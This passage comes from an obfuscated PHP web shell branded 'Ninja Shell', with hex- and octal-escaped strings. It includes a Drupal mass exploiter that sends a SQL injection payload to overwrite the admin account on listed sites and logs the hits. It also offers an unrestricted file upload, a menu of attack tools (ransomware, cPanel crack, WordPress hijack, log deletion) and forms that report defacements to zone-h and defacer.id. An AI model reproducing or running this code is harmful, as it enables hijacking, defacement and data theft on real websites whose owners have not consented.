"\74\x66\157\156\164\x20\143\x6f\x6c\x6f\x72\x3d\47\162\x65\144\x27\x3e\x23\x20\125\x70\154\157\x61\x64\40\107\141\147\x61\154\40\x4c\141\x67\x69\x20\x43\x6f\x6b\41\40\x32\74\57\x66\x6f\156\x74\x3e\x3c\142\162\x3e\74\x62\x72\x3e"; } } } } } elseif (isset($_GET[hex("\144\162\x75\x70\x61\x6c")])) { echo "\x3c\x63\x65\156\x74\x65\162\x3e\x3c\150\162\76\74\x62\x72\76"; echo "\xa\11\11\x3c\150\x32\x3e\104\x72\x75\160\x61\x6c\x20\115\141\x73\163\40\105\x78\x70\154\x6f\x69\x74\x65\x72\74\x2f\150\62\76\74\142\x72\76\xa\11\x9\x3c\146\x6f\x72\155\x20\155\145\164\x68\157\x64\x3d\47\x70\x6f\163\x74\47\40\141\143\x74\151\x6f\156\x3d\x27\x27\76\xa\11\11\x3c\x74\x65\170\164\x61\x72\145\141\40\x72\x6f\167\x73\75\x27\x31\x30\47\x63\154\141\163\163\75\47\x66\157\162\155\55\x63\x6f\156\164\x72\157\x6c\47\x20\x63\157\154\x73\x3d\x27\x31\60\47\40\x6e\x61\155\x65\x3d\x27\165\162\x6c\47\x3e\12\11\x9\150\164\x74\160\x3a\x2f\x2f\x77\x77\167\x2e\x73\x69\164\x65\x2e\x63\x6f\x6d\xa\x9\11\x68\164\x74\x70\72\x2f\x2f\x77\x77\x77\56\x73\x69\x74\145\x32\56\x63\x6f\155\74\x2f\x74\x65\x78\x74\x61\x72\145\141\x3e\x3c\x62\162\x3e\74\142\x72\76\12\11\x9\74\x69\156\x70\165\164\40\x74\x79\x70\145\x3d\47\x73\x75\142\x6d\x69\x74\47\40\x63\154\x61\x73\x73\x3d\47\x66\157\162\155\55\x63\157\156\164\162\x6f\x6c\47\40\x73\164\x79\x6c\x65\x3d\47\167\x69\x64\164\x68\72\62\65\60\160\x78\73\x27\40\156\x61\x6d\145\x3d\x27\x73\x75\142\155\151\164\47\40\166\x61\154\x75\x65\x3d\47\123\111\x4b\x41\124\41\x27\76\12\11\x9\74\x2f\146\157\x72\x6d\x3e\x3c\x2f\x63\145\156\x74\145\162\76\x3c\x68\162\x3e\x3c\x62\162\x3e\xa\11\11"; $drupal = $_GET["\x64\x72\x75\x70\141\x6c"]; if ($drupal == "\144\x72\165\160\141\x6c") { $filename = $_FILES["\146\151\154\145"]["\156\x61\155\x65"]; $filetmp = $_FILES["\x66\x69\154\x65"]["\164\155\160\x5f\156\141\155\x65"]; echo "\x3c\144\151\x76\x20\x63\x6c\x61\163\163\75\x27\x6d\171\142\157\170\x27\76\x3c\146\157\x72\x6d\x20\x6d\x65\164\x68\x6f\144\75\x27\120\117\123\124\x27\x20\x65\156\143\x74\x79\x70\145\75\47\155\x75\154\x74\151\x70\x61\162\164\x2f\x66\x6f\x72\155\55\144\x61\164\x61\x27\76\12\40\x20\x20\74\151\x6e\x70\165\x74\40\164\171\x70\x65\x3d\x27\146\151\x6c\145\x27\156\x61\155\145\75\x27\146\151\154\145\47\x20\57\76\12\x20\x20\x20\x3c\151\156\x70\x75\x74\x20\x74\171\160\145\x3d\x27\163\165\x62\155\151\x74\x27\40\x76\141\x6c\x75\x65\75\x27\x64\x72\165\160\141\x6c\x20\x21\47\40\x2f\76\xa\x3c\57\x66\157\162\155\x3e\x3c\x2f\144\x69\x76\x3e"; move_uploaded_file($filetmp, $filename); } error_reporting(0); if (isset($_POST["\163\165\x62\155\151\x74"])) { function exploit($url) { $post_data = "\x6e\141\x6d\145\133\x30\x3b\165\160\x64\x61\x74\145\x20\x75\x73\145\162\x73\40\163\x65\x74\x20\x6e\x61\x6d\145\40\45\63\104\40\47\x45\170\157\162\143\151\163\x6d\x27\40\x2c\40\160\x61\163\163\x20\x25\x33\x44\40\x27" . urlencode("\44\123\44\x44\162\x56\64\x58\x37\64\x77\164\66\x62\x54\x33\x42\150\x4a\x61\x34\x58\x30\x2e\x58\117\x35\x62\110\x58\x6c\57\x51\102\x6e\106\153\144\104\153\x59\123\x48\x6a\63\x63\105\61\132\x35\x63\x6c\107\167\x75") . "\47\x2c\163\x74\141\164\165\163\x20\x25\x33\104\x27\61\x27\x20\x77\150\145\x72\145\40\165\x69\x64\40\x25\x33\x44\40\47\61\x27\73\x23\x5d\x3d\x46\143\x55\x6b\x26\156\141\x6d\145\x5b\135\x3d\103\162\141\x70\x26\x70\x61\163\x73\x3d\x74\x65\x73\164\x26\146\157\162\155\x5f\142\x75\x69\154\x64\x5f\x69\x64\x3d\46\146\157\x72\x6d\x5f\x69\144\75\x75\x73\x65\x72\137\x6c\157\147\151\x6e\x26\157\160\x3d\114\157\x67\x2b\151\x6e"; $params = array("\150\x74\x74\160" => array("\x6d\145\x74\150\x6f\x64" => "\x50\x4f\x53\124", "\x68\145\141\144\145\x72" => "\x43\x6f\x6e\164\145\156\164\55\124\171\x70\145\x3a\40\x61\160\160\x6c\x69\x63\141\164\x69\x6f\156\57\x78\x2d\167\167\x77\55\146\x6f\162\x6d\x2d\x75\162\x6c\145\156\x63\157\144\x65\x64\xa", "\x63\157\x6e\x74\145\156\164" => $post_data)); $ctx = stream_context_create($params); $data = file_get_contents($url . "\x2f\165\163\145\162\57\x6c\157\147\151\x6e\x2f", null, $ctx); if (stristr($data, "\155\142\x5f\163\x74\x72\154\x65\x6e\50\x29\x20\x65\170\160\145\143\164\x73\40\x70\x61\162\x61\x6d\145\x74\145\x72\40\x31\x20\x74\x6f\x20\142\x65\40\x73\x74\x72\x69\156\x67") && $data || stristr($data, "\106\143\x55\153\40\103\162\141\x70") && $data) { $fp = fopen("\x65\x78\x70\x6c\157\151\x74\145\x64\56\x74\x78\x74", "\x61\x2b"); fwrite($fp, "\105\170\160\x6c\157\x69\x74\x69\x65\144\40\40\x55\x73\145\x72\x3a\40\105\170\157\162\143\151\163\x6d\x20\120\141\163\x73\x3a\x20\105\170\x6f\x72\143\x69\x73\155\40\40\75\75\75\x3d\x3d\x3e\x20{$url}\x2f\165\x73\x65\x72\57\154\x6f\147\151\156"); fwrite($fp, "\12"); fwrite($fp, "\55\55\55\55\55\x2d\x2d\x2d\x2d\55\55\55\55\55\x2d\55\55\55\55\x2d\55\55\x2d\x2d\55\x2d\x2d\x2d\x2d\x2d\x2d\55\55\55\x2d\x2d\x2d\x2d\55\55\55\55\55\55\x2d\55\55\55\x2d\x2d\x2d\x2d\55\55\x2d\x2d\55\55\55\x2d\55\x2d\55\x2d\x2d\x2d\55\x2d\x2d\55\x2d\55\55\x2d\x2d\x2d\x2d\55\55\55\55\x2d\55\x2d\x2d\55\x2d\55\55\x2d\x2d\55\55\55\x2d\55\55\x2d"); fwrite($fp, "\xa"); fclose($fp); echo "\74\x66\157\156\164\x20\x63\157\154\x6f\162\x3d\x27\x6c\x69\155\145\x27\76\x3c\x62\76\x53\165\143\143\145\163\163\72\74\146\157\x6e\x74\x20\143\x6f\x6c\157\162\75\x27\167\x68\x69\164\145\47\76\105\x78\x6f\162\143\x69\163\155\74\57\x66\157\156\x74\x3e\x20\x50\141\163\163\72\74\x66\x6f\x6e\x74\x20\143\x6f\x6c\157\x72\75\47\167\x68\151\164\145\x27\76\x45\x78\x6f\x72\x63\151\x73\155\x3c\x2f\x66\157\156\164\x3e\40\x3d\76\74\x61\x20\150\162\145\146\75\x27{$url}\57\x75\163\x65\x72\57\x6c\157\147\x69\156\x27\40\164\x61\x72\x67\145\164\75\137\142\x6c\141\x6e\153\40\x3e\74\146\x6f\156\x74\x20\143\x6f\x6c\157\162\75\x27\x67\x72\x65\x65\x6e\47\76\x20{$url}\x2f\165\163\x65\162\57\154\x6f\147\x69\156\x20\74\57\146\157\x6e\164\x3e\74\x2f\141\76\x3c\57\146\157\x6e\164\x3e\x3c\57\x62\76\74\142\162\x3e"; } else { echo "\74\x66\157\156\164\40\143\x6f\154\x6f\x72\x3d\47\x72\x65\144\x27\76\74\142\x3e\106\x61\x69\154\x65\x64\40\x3d\76\x20{$url}\x2f\x75\163\145\x72\57\x6c\157\147\151\x6e\x3c\57\146\x6f\x6e\x74\76\74\x2f\x62\76\74\142\x72\x3e"; } } $urls = explode("\12", $_POST["\165\162\x6c"]); foreach ($urls as $url) { $url = @trim($url); echo exploit($url); } } } elseif (isset($_GET[hex("\x61\x75\x74\157\x5f\x74\157\157\154\163")])) { echo "\x3c\150\x72\x3e\74\x63\145\x6e\164\x65\162\x3e\x3c\x68\x32\x3e\x41\165\164\x6f\x20\x54\157\x6f\x6c\163\x20\x4e\x69\x6e\152\141\x20\123\x68\145\x6c\x6c\x20\74\57\x68\62\76\x3c\142\x72\76\xa\74\x74\141\x62\154\145\x20\163\x74\171\x6c\145\x3d\42\167\151\x64\164\150\72\71\60\45\x22\x3e\12\x20\40\74\164\x72\76\12\x20\40\x20\x20\74\x74\144\76\x3c\141\x20\x63\154\x61\x73\x73\40\75\x20\x22\146\x6f\x72\155\55\x63\157\x6e\164\x72\157\x6c\x20\141\152\x78\42\x20\x68\162\x65\146\40\x3d\x20\x3f\144\75" . hex($d) . "\46" . hex("\x7a\x6f\156\145\x2d\150") . "\x3e\x3c\143\x65\156\x74\x65\162\76\x5a\x6f\x6e\145\40\x48\x3c\57\x63\x65\156\x74\x65\x72\x3e\74\x2f\141\76\74\57\164\x64\x3e\xa\40\x20\x20\x20\74\164\x64\x3e\74\x61\40\143\x6c\141\x73\x73\40\75\x20\42\x66\x6f\162\x6d\55\x63\x6f\156\164\x72\157\x6c\x20\141\x6a\x78\x22\x20\150\x72\145\x66\40\x3d\x20\x3f\x64\75" . hex($d) . "\x26" . hex("\144\x65\x66\x61\143\145\162\x2d\151\144") . "\x3e\74\x63\x65\156\164\x65\162\x3e\x44\145\146\x61\143\x65\x72\40\111\104\74\x2f\143\x65\156\x74\145\x72\x3e\x3c\x2f\x61\76\74\x2f\164\x64\76\xa\40\40\x20\40\74\164\144\x3e\x3c\141\x20\x63\154\141\163\163\40\x3d\x20\42\x66\157\x72\155\x2d\143\157\x6e\164\162\157\x6c\40\x61\152\x78\42\40\x68\162\145\146\40\75\40\77\x64\x3d" . hex($d) . "\46" . hex("\152\x75\155\160\x69\x6e\x67") . "\x3e\x3c\143\x65\x6e\x74\x65\162\76\112\165\155\160\x69\x6e\x67\x3c\57\143\x65\156\164\145\162\76\74\x2f\141\76\x3c\57\x74\144\76\x9\xa\40\x20\x20\40\x3c\x74\144\x3e\x3c\x61\40\143\x6c\141\163\163\x20\75\x20\42\146\157\162\155\x2d\x63\x6f\x6e\x74\x72\157\154\x20\x61\x6a\x78\42\40\150\x72\x65\146\40\75\x20\77\x64\75" . hex($d) . "\x26" . hex("\146\x61\x6b\145\x2d\x72\157\157\x74") . "\x3e\x3c\143\145\156\164\145\x72\76\x46\141\x6b\x65\40\x52\157\x6f\164\74\57\x63\145\156\164\x65\x72\76\x3c\57\x61\x3e\x3c\57\164\144\x3e\11\xa\40\x20\40\x20\x3c\x74\x64\76\x3c\x61\x20\x63\154\x61\x73\163\40\75\x20\x22\x66\157\x72\x6d\55\143\157\156\164\162\x6f\154\40\141\x6a\x78\x22\x20\x68\x72\x65\x66\x20\x3d\40\77\144\x3d" . hex($d) . "\46" . hex("\x61\x64\155\x69\x6e\x65\162") . "\x3e\74\x63\x65\156\x74\x65\x72\76\101\144\x6d\151\156\145\x72\x3c\x2f\x63\x65\x6e\164\x65\162\x3e\x3c\x2f\x61\76\x3c\x2f\x74\144\76\12\x3c\57\x74\162\76\12\74\x74\x72\76\xa\40\x20\x20\x20\74\x74\x64\x3e\x3c\x61\40\x63\154\x61\163\163\x20\x3d\x20\42\146\157\x72\155\55\x63\x6f\x6e\164\x72\157\x6c\40\x61\152\x78\42\40\x68\162\145\146\40\x3d\x20\x3f\x64\75" . hex($d) . "\46" . hex("\167\x70\x2d\x68\x69\152\141\143\x6b") . "\x3e\x3c\143\x65\x6e\x74\x65\x72\x3e\127\160\40\101\165\164\x6f\x20\x48\151\152\x61\x63\153\x3c\x2f\143\145\156\164\145\162\76\x3c\57\141\x3e\x3c\57\x74\x64\x3e\xa\40\40\40\x20\x3c\164\144\x3e\x3c\141\x20\x63\x6c\x61\163\163\x20\x3d\40\42\x66\157\162\155\x2d\143\x6f\x6e\x74\x72\157\154\x20\x61\x6a\x78\42\40\150\x72\x65\146\40\x3d\x20\77\144\75" . hex($d) . "\x26" . hex("\143\x70\141\156\145\154\x2d\162\145\x73\145\x74") . "\x3e\x3c\x63\145\156\164\145\x72\x3e\103\x70\141\156\x65\154\40\x52\145\x73\x65\x74\74\57\143\145\156\x74\x65\162\76\74\x2f\141\x3e\74\x2f\x74\144\76\xa\x20\40\40\40\x3c\x74\144\76\74\x61\40\x63\x6c\141\x73\163\x20\75\40\x22\146\157\x72\x6d\x2d\143\157\x6e\x74\162\157\154\40\x61\152\170\42\x20\150\x72\x65\146\40\x3d\40\x3f\144\x3d" . hex($d) . "\46" . hex("\x7a\x69\x70\x2d\x6d\x65\156\165") . "\76\74\x63\x65\156\x74\x65\162\x3e\x5a\x69\160\x20\x4d\145\x6e\165\x3c\x2f\143\145\156\164\x65\x72\x3e\74\x2f\141\x3e\x3c\57\164\x64\x3e\xa\40\40\40\x20\74\164\144\76\74\x61\40\143\154\141\163\163\x20\75\40\42\146\x6f\162\155\x2d\x63\x6f\x6e\164\162\157\154\x20\x61\x6a\170\x22\40\x68\162\145\x66\40\75\x20\x3f\144\x3d" . hex($d) . "\x26" . hex("\x72\x65\x76\x65\162\x73\145\55\x69\160") . "\x3e\x3c\x63\x65\x6e\x74\145\162\x3e\x52\145\166\145\162\163\145\40\x49\120\74\x2f\x63\x65\156\164\x65\x72\76\x3c\57\141\x3e\x3c\57\164\144\x3e\xa\x20\x20\x20\x20\74\164\x64\x3e\x3c\x61\40\x63\x6c\141\163\163\x20\75\40\42\x66\x6f\162\155\x2d\x63\x6f\156\164\x72\x6f\x6c\x20\141\x6a\x78\42\x20\x68\162\x65\x66\40\75\40\77\x64\x3d" . hex($d) . "\46" . hex("\x72\144\x70") . "\x3e\x3c\x63\x65\x6e\x74\x65\162\76\113\55\122\104\x50\x20\x53\150\145\x6c\154\x3c\57\x63\145\156\x74\x65\x72\x3e\74\x2f\141\x3e\74\x2f\164\x64\76\xa\74\x2f\164\162\x3e\xa\74\164\x72\x3e\12\40\40\40\40\74\164\144\76\74\141\40\143\x6c\x61\x73\163\x20\75\40\x22\146\157\x72\155\x2d\143\157\156\164\162\157\x6c\x20\x61\152\170\42\40\150\162\145\x66\40\75\x20\x3f\x64\75" . hex($d) . "\x26" . hex("\x72\x61\x6e\163\x6f\155\167\141\x72\x65") . "\76\x3c\143\x65\156\164\145\162\76\122\x61\156\163\157\x6d\167\141\x72\x65\74\57\143\x65\x6e\x74\145\x72\x3e\x3c\x2f\141\x3e\x3c\57\164\144\x3e\12\40\x20\x20\x20\x3c\x74\x64\x3e\x3c\x61\x20\143\x6c\x61\163\x73\x20\x3d\x20\x22\146\157\x72\155\55\143\157\156\x74\162\157\154\x20\141\152\170\x22\40\x68\x72\x65\x66\x20\x3d\x20\77\144\x3d" . hex($d) . "\46" . hex("\167\150\157\x69\163") . "\76\x3c\x63\145\156\164\x65\x72\76\127\x68\x6f\x49\x73\74\57\143\x65\156\164\x65\162\x3e\74\x2f\x61\x3e\x3c\57\164\144\76\xa\40\40\40\40\74\x74\x64\x3e\x3c\141\x20\x63\x6c\141\163\163\x20\x3d\40\x22\146\x6f\x72\155\55\x63\157\x6e\164\x72\x6f\x6c\x20\x61\x6a\x78\x22\x20\x68\162\145\146\x20\75\x20\x3f\x64\75" . hex($d) . "\x26" . hex("\160\x68\160\x69\156\146\x6f") . "\76\x3c\143\145\156\164\x65\162\x3e\120\x68\160\x20\111\x6e\x66\157\74\57\143\x65\x6e\164\x65\162\76\74\x2f\141\x3e\74\x2f\164\x64\x3e\x9\12\x20\40\x20\x20\x3c\164\x64\x3e\74\x61\40\x63\154\141\x73\163\40\75\40\42\x66\157\162\155\55\x63\x6f\156\164\x72\157\154\x20\x61\152\170\x22\x20\150\x72\145\146\40\x3d\x20\x3f\144\75" . hex($d) . "\x26" . hex("\151\x6e\152\145\x63\x74\x2d\x63\x6f\144\x65") . "\76\74\x63\x65\156\164\x65\x72\x3e\x49\156\152\145\x63\x74\x20\x43\157\x64\x65\74\x2f\x63\145\x6e\x74\145\x72\76\74\57\141\76\x3c\x2f\x74\144\76\11\xa\40\x20\40\40\74\x74\144\76\x3c\141\40\x63\154\141\x73\163\x20\x3d\x20\42\146\157\x72\155\x2d\143\157\x6e\164\x72\157\154\x20\141\152\170\x22\x20\x68\162\x65\146\x20\75\x20\77\144\75" . hex($d) . "\46" . hex("\144\142\x2d\144\165\x6d\160") . "\x3e\74\143\x65\156\x74\x65\162\x3e\x44\x42\x20\104\x75\x6d\x70\74\57\x63\145\156\164\145\162\76\74\x2f\141\76\74\x2f\164\144\76\xa\74\57\x74\x72\x3e\12\74\x74\x72\x3e\xa\40\x20\x20\x20\74\x74\x64\76\74\x61\x20\143\x6c\141\163\x73\x20\x3d\40\x22\146\157\x72\155\x2d\143\x6f\156\x74\x72\157\154\x20\141\152\170\x22\x20\x68\x72\x65\x66\x20\x3d\40\77\x64\75" . hex($d) . "\46" . hex("\x63\x70\55\143\162\141\143\x6b") . "\76\x3c\x63\x65\156\x74\145\162\76\x43\160\141\x6e\145\x6c\x20\103\162\141\x63\x6b\x3c\57\143\x65\x6e\164\x65\x72\76\x3c\57\141\x3e\74\57\x74\144\76\12\40\x20\x20\40\x3c\164\x64\76\74\x61\40\143\x6c\141\163\163\40\75\40\42\x66\157\162\x6d\x2d\x63\x6f\x6e\x74\x72\x6f\154\x20\x61\152\170\42\40\x68\x72\145\x66\x20\x3d\40\77\x64\x3d" . hex($d) . "\46" . hex("\x73\155\164\x70\55\147\x72\x61\142") . "\76\x3c\143\x65\156\164\145\162\76\x53\115\124\x50\x20\x47\162\x61\142\x62\x65\162\74\x2f\x63\145\156\x74\145\162\x3e\74\57\141\x3e\74\x2f\164\144\76\11\xa\x20\x20\x20\x20\x3c\x74\x64\x3e\74\141\x20\x63\154\x61\163\163\x20\x3d\40\42\x66\157\162\155\x2d\143\x6f\156\164\x72\x6f\154\x20\x61\152\170\x22\40\x68\x72\145\146\40\x3d\x20\x3f\x64\75" . hex($d) . "\46" . hex("\144\157\155\141\151\156\x73") . "\x3e\x3c\x63\145\156\164\145\162\76\x44\157\x6d\x61\x69\x6e\x73\x20\126\151\145\x77\145\162\74\x2f\x63\145\156\164\145\x72\x3e\74\x2f\x61\76\x3c\x2f\x74\144\76\12\40\x20\40\x20\x3c\164\x64\x3e\x3c\x61\40\x63\154\141\163\163\x20\x3d\40\42\x66\x6f\162\155\55\x63\x6f\x6e\x74\162\157\154\40\x61\152\170\x22\x20\x68\162\x65\x66\40\x3d\x20\77\x64\x3d" . hex($d) . "\46" . hex("\x77\150\155\143\x73\55\x64\x65\x63\157\144\145\x72") . "\76\74\143\x65\x6e\x74\x65\162\x3e\x57\110\115\x43\x53\40\104\145\x63\157\x64\145\x72\x3c\x2f\x63\x65\x6e\x74\145\x72\x3e\74\x2f\141\x3e\x3c\x2f\164\x64\x3e\11\12\40\40\40\40\74\x74\144\x3e\x3c\141\x20\143\154\x61\x73\x73\x20\75\x20\x22\146\157\x72\x6d\x2d\143\157\156\164\x72\157\x6c\40\141\x6a\170\42\40\x68\x72\x65\146\x20\75\40\77\x64\x3d" . hex($d) . "\46" . hex("\x64\x65\154\x65\164\145\x2d\x6c\x6f\147\x73") . "\76\x3c\143\145\x6e\x74\x65\162\76\104\x65\x6c\145\164\145\x20\114\157\147\163\74\57\x63\x65\x6e\x74\x65\162\76\x3c\57\141\x3e\x3c\x2f\164\144\x3e\12\74\57\x74\162\x3e\xa\74\57\x74\141\x62\154\x65\x3e\12\74\x62\x72\x3e\74\150\x72\x3e"; } elseif (isset($_GET[hex("\x7a\157\x6e\x65\x2d\150")])) { ?>
<form action="" method="post">
<center>
<hr><br>
<h2>Zone H Submit Ninja Shell</h2>
<u>Defacer :</u>
<input type="text" name="defacer" style="width: 250px; height: 30px;" value="Your Zone-h Name" class="form-control" />
<br>
<u>Attacks Method :</u>
<select name="hackmode" class="form-control" style="width: 250px; height: 40px;">
<option>--------SELECT--------</option>
<option value="1">known vulnerability (i.e. unpatched system)</option>
<option value="2">undisclosed (new) vulnerability</option>
<option value="3">configuration / admin. mistake</option>
<option value="4">brute force attack</option>
<option value="5">social engineering</option>
<option value="6">Web Server intrusion</option>
<option value="7">Web Server external module intrusion</option>
<option value="8">Mail Server intrusion</option>
<option value="9">FTP Server intrusion</option>
<option value="10">SSH Server intrusion</option>
<option value="11">Telnet Server intrusion</option>
<option value="12">RPC Server intrusion</option>
<option value="13">Shares misconfiguration</option>
<option value="14">Other Server intrusion</option>
<option value="15">SQL Injection</option>
<option value="16">URL Poisoning</option>
<option value="17">File Inclusion</option>
<option value="18">Other Web Application bug</option>
<option value="19">Remote administrative panel access bruteforcing</option>
<option value="20">Remote administrative panel access password guessing</option>
<option value="21">Remote administrative panel access social engineering</option>
<option value="22">Attack against administrator(password stealing/sniffing)</option>
<option value="23">Access credentials through Man In the Middle attack</option>
<option value="24">Remote service password guessing</option>
<option value="25">Remote service password bruteforce</option>
<option value="26">Rerouting after attacking the Firewall</option>
<option value="27">Rerouting after attacking the Router</option>
<option value="28">DNS attack through social engineering</option>
<option value="29">DNS attack through cache poisoning</option>
<option value="30">Not available</option>
</select>
<br>
<u>Reasons :</u>
<select name="reason" class="form-control" style="width: 250px; height: 40px;">
<option style='display:block;width:100%;'>--------SELECT--------</option>
<option value="1">Heh...just for fun!</option>
<option value="2">Revenge against that website</option>
<option value="3">Political reasons</option>
<option value="4">As a challenge</option>
<option value="5">I just want to be the best defacer</option>
<option value="6">Patriotism</option>
<option value="7">Not available</option>
</select>
<br>
<textarea class="form-control" name="domain" style='display:block;width:25%;height:150px;'>List Of Domains</textarea>
<p>(1 Domain Per Lines)</p>
<input type="submit" class="form-control" style="width: 250px; height: 40px;" value="Send Now !" name="SendNowToZoneH" />
</form>
</center>
<hr><br><span style="color:red">
<?php function ZoneH($url, $hacker, $hackmode, $reson, $site) { $k = curl_init(); curl_setopt($k, CURLOPT_URL, $url); curl_setopt($k, CURLOPT_POST, true); curl_setopt($k, CURLOPT_POSTFIELDS, "\144\145\146\141\x63\145\162\x3d" . $hacker . "\x26\144\157\x6d\141\151\156\x31\x3d" . $site . "\46\150\141\143\x6b\x6d\157\x64\x65\75" . $hackmode . "\46\x72\145\141\163\157\156\75" . $reson); curl_setopt($k, CURLOPT_FOLLOWLOCATION, true); curl_setopt($k, CURLOPT_RETURNTRANSFER, true); $kubra = curl_exec($k); curl_close($k); return $kubra; } if (isset($_POST["\123\x65\x6e\x64\116\157\167\x54\157\132\x6f\x6e\145\110"])) { ob_start(); $sub = @get_loaded_extensions(); if (!in_array("\143\165\x72\x6c", $sub)) { die("\133\x2d\x5d\x20\103\x75\x72\154\x20\111\163\x20\x4e\x6f\x74\40\x53\x75\160\x70\x6f\x72\164\145\x64\x20\41\x21\40"); } $hacker = $_POST["\144\145\146\141\143\x65\x72"]; $method = $_POST["\150\x61\x63\153\155\157\144\x65"]; $neden = $_POST["\x72\145\141\163\157\x6e"]; $site = $_POST["\144\157\x6d\x61\151\156"]; if ($hacker == "\x59\157\x75\162\40\x5a\x6f\156\145\x2d\x68\x20\x4e\141\x6d\x65") { die("\x5b\x2d\135\x20\131\x6f\x75\x20\x4d\165\163\x74\x20\106\x69\154\x6c\40\x74\150\145\x20\x41\x74\x74\x61\x63\x6b\145\162\40\156\x61\155\x65\40\x21"); } elseif ($method == "\55\55\55\55\x2d\x2d\55\x2d\x53\x45\114\105\103\x54\55\x2d\x2d\x2d\55\55\x2d\x2d") { die("\x5b\x2d\135\x20\131\157\165\x20\115\165\163\x74\x20\123\x65\154\x65\143\164\x20\x54\150\x65\40\115\x65\x74\150\157\x64\40\x21"); } elseif ($neden == "\55\x2d\55\x2d\x2d\55\x2d\55\x53\105\x4c\x45\x43\x54\55\55\55\55\x2d\55\55\x2d") { die("\x5b\55\135\x20\x59\x6f\165\x20\x4d\165\x73\x74\x20\x53\145\x6c\x65\x63\x74\x20\x54\150\145\40\x52\x65\x61\x73\157\156"); } elseif (empty($site)) { die("\x5b\x2d\x5d\x20\131\157\165\x20\x4d\x75\163\164\x20\x49\156\164\x65\162\40\x74\150\x65\40\x53\x69\164\x65\163\40\114\x69\x73\x74\x20\41\x20"); } $i = 0; $sites = explode("\xa", $site); while ($i < count($sites)) { if (substr($sites[$i], 0, 4) != "\150\164\164\x70") { $sites[$i] = "\x68\x74\164\160\72\x2f\x2f" . $sites[$i]; } ZoneH("\150\164\x74\160\72\57\57\172\157\x6e\145\x2d\150\56\157\162\147\x2f\x6e\x6f\x74\151\146\x79\57\163\151\x6e\x67\154\145", $hacker, $method, $neden, $sites[$i]); echo "\123\x69\x74\145\x20\72\x20" . $sites[$i] . "\x20\104\x65\146\141\143\x65\144\40\x21\74\142\162\76"; ++$i; } echo "\x5b\x2b\x5d\x20\123\x65\x6e\x64\151\x6e\x67\x20\123\151\164\145\163\40\x54\x6f\x20\132\x6f\156\145\55\110\x20\110\141\163\40\x42\145\145\x6e\40\103\x6f\x6d\x70\x6c\x65\x74\x65\x64\40\123\x75\143\143\x65\x73\163\146\x75\154\x6c\171\x20\x21\x21"; } ?>
</span>
<?php } elseif (isset($_GET[hex("\x64\145\x66\x61\143\x65\162\x2d\151\x64")])) { echo "\x3c\150\162\x3e\x3c\x62\x72\76\74\x63\145\156\164\x65\x72\76\12\11\x9\x3c\150\62\76\104\145\146\x61\143\145\x72\40\111\x44\x20\x53\165\142\155\x69\x74\40\116\151\x6e\x6a\x61\40\123\x68\x65\154\154\x3c\57\150\x32\x3e\xa\11\11\x3c\x66\157\x72\x6d\x20\x6d\x65\x74\x68\157\144\75\47\160\x6f\163\164\x27\x3e\xa\x9\x9\x3c\x75\76\x44\x65\146\x61\143\x65\162\x3c\x2f\x75\x3e\72\x20\74\142\x72\76\12\11\11\x3c\x69\x6e\x70\x75\164\40\x63\154\x61\x73\163\x20\x3d\x20\x27\x66\x6f\162\x6d\x2d\x63\x6f\x6e\164\162\x6f\x6c\x27\40\163\x74\171\154\145\x3d\47\167\x69\144\x74\150\72\62\x35\x30\160\170\73\x20\150\x65\x69\147\150\164\x3a\64\60\x70\170\x3b\47\x20\164\171\x70\x65\x3d\47\164\145\x78\x74\x27\40\156\x61\x6d\145\75\47\x68\x65\153\x65\154\x27\x20\163\151\172\145\75\x27\x35\60\47\x20\x76\x61\x6c\165\145\x3d\x27\x2e\x2f\105\170\x6f\x72\x63\x69\163\155\61\63\63\x37\47\x3e\74\142\x72\76\12\x9\11\74\x75\76\124\x65\x61\x6d\x3c\x2f\165\76\x3a\40\74\142\x72\76\12\11\x9\x3c\x69\156\x70\x75\164\40\x63\x6c\x61\163\x73\x20\x3d\x20\47\x66\157\162\155\55\143\157\x6e\164\x72\x6f\154\x27\x20\163\164\x79\x6c\x65\75\x27\167\151\144\164\150\x3a\x32\x35\x30\160\170\73\40\150\x65\x69\147\150\x74\72\x34\x30\160\170\73\47\40\164\171\160\145\75\47\x74\145\x78\164\x27\x20\156\141\155\x65\75\x27\x74\151\155\x27\x20\163\x69\x7a\x65\x3d\47\65\x30\x27\x20\166\x61\x6c\x75\145\x3d\47\x49\156\x64\x65\170\40\101\164\x74\x61\x63\153\x65\162\x27\76\x3c\x62\162\x3e\12\11\11\74\165\x3e\104\157\x6d\x61\151\x6e\163\x3c\x2f\165\x3e\x3a\40\74\x62\x72\x3e\xa\x9\11\x3c\164\x65\170\x74\x61\x72\145\141\x20\x63\x6c\141\x73\163\x20\75\40\47\x66\x6f\162\155\x2d\x63\157\x6e\x74\x72\157\154\x27\x20\x73\x74\x79\x6c\x65\x3d\x27\x77\151\x64\x74\150\72\x20\64\65\60\160\170\73\x20\x68\x65\x69\147\150\x74\x3a\x20\x31\65\x30\x70\170\73\47\x20\x6e\x61\155\x65\75\x27\x73\x69\164\145\163\47\x3e\x3c\57\x74\x65\x78\164\x61\162\x65\141\76\74\x62\162\x3e\xa\x9\11\74\151\x6e\x70\165\164\x20\x20\143\x6c\141\x73\x73\x20\75\40\x27\146\x6f\162\155\55\143\157\156\x74\162\x6f\x6c\x27\x20\163\x74\171\x6c\x65\75\47\x77\x69\144\x74\x68\72\62\65\x30\160\170\x3b\x20\x68\145\x69\x67\x68\164\72\64\60\160\170\x3b\40\x27\x74\171\x70\145\x3d\x27\x73\x75\142\x6d\x69\164\47\40\156\x61\x6d\145\x3d\47\147\x6f\47\x20\x76\141\x6c\x75\145\x3d\47\123\x75\x62\x6d\x69\164\x27\76\xa\11\11\x3c\57\146\x6f\x72\155\x3e\x3c\150\x72\x3e\x3c\x62\162\76"; $site = explode("\15\12", $_POST["\163\151\x74\145\x73"]); $go = $_POST["\x67\x6f"]; $hekel = $_POST["\x68\x65\153\x65\x6c"]; $tim = $_POST["\x74\x69\x6d"]; if ($go) { foreach ($site as $sites) { $zh = $sites; $form_url = "\x68\x74\164\160\163\72\57\x2f\167\167\x77\56\x64\x65\x66\x61\x63\x65\x72\56\151\144\57\x6e\157\164\151\146\x79"; $data_to_post = array(); $data_to_post["\x61\164\x74\x61\143\153\x65\162"] = "{$hekel}"; $data_to_post["\164\145\x61\x6d"] = "{$tim}"; $data_to_post["\160\x6f\x63"] = "\x53\x51\114\x20\x49\156\x6a\x65\x63\164\x69\157\x6e"; $data_to_post["\x75\162\154"] = "{$zh}"; $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $form_url); curl_setopt($curl, CURLOPT_POST, 